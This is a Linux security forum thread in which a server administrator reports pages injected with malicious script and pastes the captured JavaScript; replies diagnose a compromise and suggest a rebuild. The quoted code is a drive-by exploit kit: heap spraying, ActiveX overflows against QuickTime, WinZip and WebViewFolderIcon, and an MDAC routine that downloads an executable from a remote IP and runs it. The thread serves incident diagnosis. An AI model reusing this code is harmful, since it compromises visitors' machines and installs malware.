Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
Redhat Enterprise Linux v3 Update 9 server running behind Foundry load balancer. The server has been updated with the latest patches from Redhat. Apache version is 2.0.46. We are also running Coldfusion MX 7 on the server and using PHP to serve dynamic content.
Problem description:
Earlier this week, our users started reporting that they were getting active-x prompts for Microsoft Data Access Component installation. In addition some of them were getting hit byt the RTSP bug (quicktime) and some were getting the JS/Explot-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple html, php, cfm, etc) at times a script tag similar to the one below is inserted right after the <body> tag.
The javascript file name changes and the problem only occurs at times. There is no set pattern to reproduce the problem although I have noticed that if I connect to the server via a new IP address from my DSL connection, I get the javascript in the source.
I ran some sniffer traces on the server and my laptop. This showed that the javascript was being sent by the server. I was able to capture the javascript (contents of the javascript below). If anybody wants to see the sniffer traces, please let me know and I can provide download links.
We also saw a post at Bloodhound virus - Web Hosting Forum - Web hosting discussion at SiteGround.com which shows similar problem. Unfortunately the solution (use grsecurity kernel) does not makes any sense and I suspect that it would be a temp solution.
Solutions tried:
I have checked for the filenames but they do not exist on the server.
1) Have run chkrootkit and rootkit hunter - All clean
2) Have run clamav - All clean
3) Have run f-prot - All clean
4) Manually compiled Apache 2.0.59 + PHP 5.2.3 - Problem persists.
Would appreciate if anybody could provide some inputs on what we might be dealing with and how to resolve the problem.
Javascript code:
var arg="akmukvfd";
var MU = "http://" + window.location.hostname + "/" + arg;
var MH = '';
for (i=0; i < MU.length; i++)
{
var b = MU.charCodeAt (i);
MH = MH + b.toString (16);
}
MH = MH.toUpperCase();
if (Math.round(MU.length/2) != (MU.length/2))
{
MH += '00';
}
var MR = '';
for (i=0; i < MH.length; i += 4)
{
MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
}
var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
mem_flag = 1;
having();
return memory;
}
function startWVF()
{
for (i=0;i<128;i++)
{
try{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon .1');
tar.setSlice(0x7ffffffe, 0x0c0c0c0c, 0x0c0c0c0c,0x0c0c0c0c );
}catch(e){}
}
}
function startWinZip(object)
{
var xh = 'A';
while (xh.length < 231) xh+='A';
xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}
function startOverflow(num)
{
if (num == 0) {
try {
var qt = new ActiveXObject('QuickTime.QuickTime');
if (qt) {
var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
'<param name="src" value="http://66.96.218.85/download/167212/movie.qtl">'+
'<param name="autoplay" value="true">'+
'<param name="loop" value="false">'+
'<param name="controller" value="true">'+
'</object>';
if (! mem_flag) makeSlide();
document.getElementById('mydiv').innerHTML = qthtml;
num = 255;
}
} catch(e) { }
if (num = 255) setTimeout("startOverflow(1)", 2000);
else startOverflow(1);
} else if (num == 1) {
try {
var winzip = document.createElement("object");
winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-BA413F034904");
var ret=winzip.CreateNewFolderFromName(unescape("%00") );
if (ret == false) {
if (! mem_flag) makeSlide();
startWinZip(winzip);
num = 255;
}
} catch(e) { }
if (num = 255) setTimeout("startOverflow(2)", 2000);
else startOverflow(2);
} else if (num == 2) {
try {
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon .1');
if (tar) {
if (! mem_flag) makeSlide();
startWVF();
}
} catch(e) { }
}
}
function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}
return randomstring;
}
function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}
function MDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe =
OUTPUT MU2 HERE
;
while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;
try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} catch(e) { a = null; }
if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microsoft.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP");
}
if (! v[1]) {
v[1] = CreateObject(a, "ADODB.Stream");
}
if (! v[2]) {
v[2] = CreateObject(a, "WScript.Shell");
if (! v[2]) {
v[2] = CreateObject(a, "Shell.Application");
if (v[2]) n=1;
}
}
}
i++;
}
if (v[0] && v[1] && v[2]) {
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
var name = "c:\\sys"+GetRandString(4)+".exe";
if (ADOBDStreamSave(v[1], name, data) == 1) {
if (ShellExecute(v[2], name, n) == 1) {
ret=1;
}
}
}
}
Seems pretty clear that the server has been cracked. I wonder...did you check the signatures on all the security updates to the server? Someone got you.
Do you have hard passwords set on SSH and ftp? Do you have root login disabled? Who has physical access to the server?
If you are unable to find the particular code that is compromised, your best solution is to start over with a clean install of the OS. Actually, this is your best solution anyway. After doing the clean install, install and configure tripwire to keep track of changes.
Unfortunately the solution (use grsecurity kernel) does not makes any sense and I suspect that it would be a temp solution.
Sounds like the right solution to me, and a permanent one too. Though if you're going to rebuild using a newer version of RHEL might as well use SELinux instead.
Maybe could help to know what the name of the virus is JS:IESlice.
With this name is detected by Avast Antivirus. Seems to be new in the city (first spots reported on July 15 or so) and exist only a few reference in the web about this trojan downloader.
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.